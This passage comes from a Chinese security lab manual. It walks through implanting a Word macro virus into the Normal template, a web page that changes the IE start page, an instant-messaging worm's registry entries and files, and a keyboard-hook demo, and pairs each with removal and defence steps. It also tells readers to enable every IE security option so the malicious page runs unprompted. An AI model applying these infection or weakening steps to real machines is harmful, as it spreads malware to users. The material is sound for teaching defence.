Outlook的安全機(jī)制判斷附件為不安全因素而禁止用戶訪問附件，但使用其他簡(jiǎn)易郵件客戶端或者用瀏覽器收取郵件時(shí)，用戶可能會(huì)下載并執(zhí)行附件腳本造成病毒的進(jìn)一步傳播。郵件病毒一般為附著型病毒，也就是通過郵件的形式來傳播，病毒內(nèi)部機(jī)制還是信賴其它文件型、木馬、蠕蟲等病毒體來發(fā)揮作用。通常不輕易打開不明附件，便無此類事件發(fā)生。 Word宏病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：Word2003、Outlook2003【實(shí)驗(yàn)步驟】啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，進(jìn)入Windows2003系統(tǒng)；雙擊桌面上的“病毒實(shí)驗(yàn)”圖標(biāo)，進(jìn)入病毒實(shí)驗(yàn)界面。在界面上選擇“Word宏病毒實(shí)驗(yàn)”，進(jìn)入其實(shí)施面板，如圖2.4.81所示。圖2.4.81實(shí)驗(yàn)進(jìn)行前，要先點(diǎn)擊“初始化病毒工具”按鈕，對(duì)其實(shí)驗(yàn)所需的工具進(jìn)行初始化；在實(shí)驗(yàn)過程中，如果所需的工具被殺毒軟件查殺，要再次點(diǎn)擊“初始化病毒工具”按鈕，對(duì)工具重新進(jìn)行初始化，以便實(shí)驗(yàn)順利進(jìn)行。一、 使用示例1代碼選擇“示例1源碼”，在右側(cè)病毒介紹框內(nèi)查看示例1 的源碼，如圖2.4.82所示。圖2.4.82二、 對(duì)doc1進(jìn)行病毒殖入(1) 點(diǎn)擊“啟動(dòng)doc1”，打開Word文檔，在工具欄點(diǎn)擊“安全性”，設(shè)置Word安全性，如圖2.4.83所示。圖2.4.83(2) 按下Alt+F11，如圖2.4.84所示；打開如圖2.4.85所示的project(Doc1)中的ThisDocument，將示例1的源代碼復(fù)制到此。圖2.4.84圖2.4.85(3) 查看“Normal|ThisDocument”，如圖2.4.86所示Normal下的ThisDocument為空。圖2.4.86(4) 關(guān)閉doc1文檔。然后再點(diǎn)擊面板中的“啟動(dòng)doc1”，在doc1打開的過程中，會(huì)出現(xiàn)如圖2.4.87所示的提示框，示例代碼1執(zhí)行成功。圖2.4.87三、 結(jié)果分析(1) 按下Alt+F11，查看其下的Normal模板中的ThisDocument，已被植入病毒代碼，如圖2.4.88所示。圖2.4.88(2) 這時(shí)再打開其它doc文件，都會(huì)發(fā)生彈出對(duì)話框的效果，如圖2.4.89所示。圖2.4.89四、 查殺方法(1) 禁止宏防御宏病毒的根本，在于打開Word文檔時(shí)先禁止所有以auto開頭的宏。方法是：?jiǎn)螕艄ぞ卟藛蜗碌摹昂辍?，然后單擊“安全性”，在如圖2.4.810所示的對(duì)話框中選擇“非常高”，這樣Word就有了防止“自動(dòng)宏”執(zhí)行的功能，將取消未經(jīng)簽署的任何宏。圖2.4.810(2) 刪除來歷不明的宏在宏管理器中，刪除全部可疑宏，或者在宏編輯器中刪除可疑宏。(3) 恢復(fù)被宏病毒所破壞的Word1) 退出Word，然后先到系統(tǒng)盤(c:)根目錄下查看是否存在autoexec.dot文件，如果存在，而又不知道它是什么時(shí)候出現(xiàn)的，刪除之。2) 找到normal.dot文件(一般在C:Documents and SettingsAdiministratorApplication DataMicrosoftTemplates目錄中)，用先前的干凈備份替換之或干脆刪除之(會(huì)重新生成一個(gè))。3) 查看normal.dot所在目錄是否還存在其它模板文件，如果存在且不是自己復(fù)制進(jìn)去的，刪除之。4) 重新啟動(dòng)Word，即可恢復(fù)正常。HTML惡意代碼實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】Windows實(shí)驗(yàn)臺(tái)所需工具：瀏覽器IE6.0或以上版本【實(shí)驗(yàn)步驟】啟動(dòng)Windows實(shí)驗(yàn)臺(tái)，進(jìn)入Windows2003系統(tǒng)；雙擊桌面上的“病毒實(shí)驗(yàn)”圖標(biāo)，進(jìn)入病毒實(shí)驗(yàn)界面。在界面上選擇“HTML惡意代碼實(shí)驗(yàn)”，進(jìn)入其實(shí)施面板。實(shí)驗(yàn)進(jìn)行前，要先點(diǎn)擊“初始化病毒工具”按鈕，對(duì)其實(shí)驗(yàn)所需的工具進(jìn)行初始化；在實(shí)驗(yàn)過程中，如果所需的工具被殺毒軟件查殺，要再次點(diǎn)擊“初始化病毒工具”按鈕，對(duì)工具重新進(jìn)行初始化，以便實(shí)驗(yàn)順利進(jìn)行。一、 進(jìn)行test.html編輯(1) 點(diǎn)擊面板中“編輯test網(wǎng)頁(yè)”，將“更改主頁(yè)”中代碼添入并保存退出。如圖2.4.91所示。圖2.4.91(2) 此時(shí)，test.html網(wǎng)頁(yè)已為包含惡意代碼網(wǎng)頁(yè)；在啟動(dòng)時(shí)，將修改注冊(cè)表中“HKEY_CURRENT_USERSoftwareMicrosoftInternet EXPlorerMainStart Page”的值為“”。二、 被攻擊現(xiàn)象(1) 點(diǎn)擊面板中的“啟動(dòng)test網(wǎng)頁(yè)”，如圖2.4.92所示。圖2.4.92(2) 點(diǎn)擊“是”，執(zhí)行完成，運(yùn)行結(jié)果如圖2.4.93所示。圖2.4.93(3) 查看注冊(cè)表中項(xiàng)，已改變，如圖2.4.94所示。圖2.4.94(4) 如果將html放入IIS中，被其它主機(jī)訪問時(shí)，其它主機(jī)的IE需要進(jìn)行設(shè)置，便可不出現(xiàn)步驟(1)中的提示了，如圖2.4.95所示，將“Internet”和“本地Intranet”中的，“自定義設(shè)置”中的“安全設(shè)置”中所有的選項(xiàng)都“啟動(dòng)”。圖2.4.95三、 防治方法(1) 要避免被網(wǎng)頁(yè)惡意代碼感染，首先關(guān)鍵是不要輕易去一些并不信任的站點(diǎn)。(2) 運(yùn)行IE時(shí)，點(diǎn)擊“工具|Internet選項(xiàng)|安全|Internet區(qū)域的安全級(jí)別”，把安全級(jí)別由“中”改為“高”。具體方案是：在IE窗口中點(diǎn)擊“工具|Internet選項(xiàng)”，在彈出的對(duì)話框中選擇“安全”標(biāo)簽，再點(diǎn)擊“自定義級(jí)別”按鈕，就會(huì)彈出“安全設(shè)置”對(duì)話框，把其中所有ActiveX插件和控件以及與Java相關(guān)全部選項(xiàng)選擇“禁用”。(3) 一定要在計(jì)算機(jī)上安裝防火墻，并要時(shí)刻打開“實(shí)時(shí)監(jiān)控功能”。(4) 在注冊(cè)表的KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下，增加名為DisableRegistryTools的DWORD值項(xiàng)，將其值改為“1”，即可禁止使用注冊(cè)表編輯器命令regedit.exe。因?yàn)樘厥庠蛐枰薷淖?cè)表，可應(yīng)用如下解鎖方法：開始-運(yùn)行-gpedit.msc 打開組策略 左面分級(jí)展開 用戶配置-管理模板-系統(tǒng) 右面有個(gè)阻止訪問注冊(cè)表編輯工具 設(shè)置成已禁用 確定即可。(5) 隨時(shí)升級(jí)IE瀏覽器的補(bǔ)丁。即時(shí)通信型病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】本地主機(jī)或Windows實(shí)驗(yàn)臺(tái)或其他安裝Windows系統(tǒng)的主機(jī)MSN【實(shí)驗(yàn)步驟】一、 病毒發(fā)作現(xiàn)象如Error! Reference source not found.所示，用戶運(yùn)行接收到的壓縮文件中的程序就會(huì)被病毒感染。病毒還會(huì)在用戶電腦里釋放一個(gè)后門程序，黑客可以利用IRC軟件遠(yuǎn)程控制中毒電腦，竊取個(gè)人資料，從而使用戶面臨極大的安全威脅。圖2.4.101二、 手工清除方法(一) 刪除病毒在注冊(cè)表中的啟動(dòng)項(xiàng)目(1) 點(diǎn)擊“開始”菜單，選擇運(yùn)行；輸入“regedit”啟動(dòng)注冊(cè)表編輯器。(2) 打開HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionShellServiceObjectDelayLoad項(xiàng)，找到名為“syshosts”一項(xiàng)，將其值記錄下來。例如本機(jī)中該值為“8D4C2FB9-6DF1-46EA-B6A0-D6”，如圖2.4.102所示。圖2.4.102(3) 將syshosts項(xiàng)刪除打開注冊(cè)表中的HKEY_CLASSES_ROOTCLSID項(xiàng)，找到剛剛記錄下的項(xiàng)目，本例中為8D4C2FB9-6DF1-46EA-B6A0-D6，如圖2.4.103所示。圖2.4.103(4) 重新啟動(dòng)計(jì)算機(jī)。(二) 刪除病毒文件(1) 打開“我的電腦”，選擇菜單“工具|文件夾選項(xiàng)”，點(diǎn)擊“查看”，取消“隱藏受保護(hù)的操作系統(tǒng)文件”前的對(duì)勾，并在“隱藏文件和文件夾”項(xiàng)中選擇“顯示所有文件和文件夾”，點(diǎn)擊“確定”；同時(shí)取消掉“隱藏已知類型文件的擴(kuò)展名”前的對(duì)勾，點(diǎn)擊“確定”。(2) 進(jìn)入Windows文件夾(默認(rèn)為C:Windows)，找到名為“photos.zip”的文件，如圖2.4.104所示，將其刪除。圖2.4.104(3) 進(jìn)入系統(tǒng)文件夾(默認(rèn)為C:Windowssystem32)，找到名為“syshosts.dll”的文件，如圖2.4.105所示，將其刪除。圖2.4.105(4) 再次重新啟動(dòng)計(jì)算機(jī)，查看這兩個(gè)文件是否存在，若不存在，則說明病毒已經(jīng)被清除干凈。鍵盤鉤子病毒實(shí)驗(yàn)【實(shí)驗(yàn)環(huán)境】本地主機(jī)或Windows實(shí)驗(yàn)臺(tái)或其他安裝Windows系統(tǒng)的主機(jī)Microsoft Visual Studio 2005/C#【實(shí)驗(yàn)步驟】簡(jiǎn)單的理解，鉤子就是想鉤住一些東西，在程序里可以利用鉤子提前處理些Windows消息。本實(shí)驗(yàn)通過鍵盤鉤子實(shí)驗(yàn)介紹病毒的實(shí)現(xiàn)原理。下載本實(shí)驗(yàn)的示例源碼，并解壓縮。進(jìn)入“HookTestbinDebug”目錄，雙擊執(zhí)行HookTest.exe如下圖：點(diǎn)擊開始按鈕，用戶在TextBox里輸入的時(shí)候，不管敲鍵盤的哪個(gè)鍵，TextBox里顯示的始終為“鉤子已經(jīng)改寫了輸入內(nèi)容！”并給出提示信息“您輸入的內(nèi)容已經(jīng)被改寫，小心病毒哦！”如下圖；這時(shí)我們就可以利用鉤子監(jiān)聽鍵盤消息，先往Windows的鉤子鏈表中加入一個(gè)自己寫的鉤子監(jiān)聽鍵盤消息，只要一按下鍵盤就會(huì)產(chǎn)生一個(gè)鍵盤消息，我們的鉤子在這個(gè)消息傳到TextBox之前先截獲它，讓TextBox顯示“鉤子已經(jīng)改寫了輸入內(nèi)容！”并彈出提示信息，之后結(jié)束這個(gè)消息，這樣Te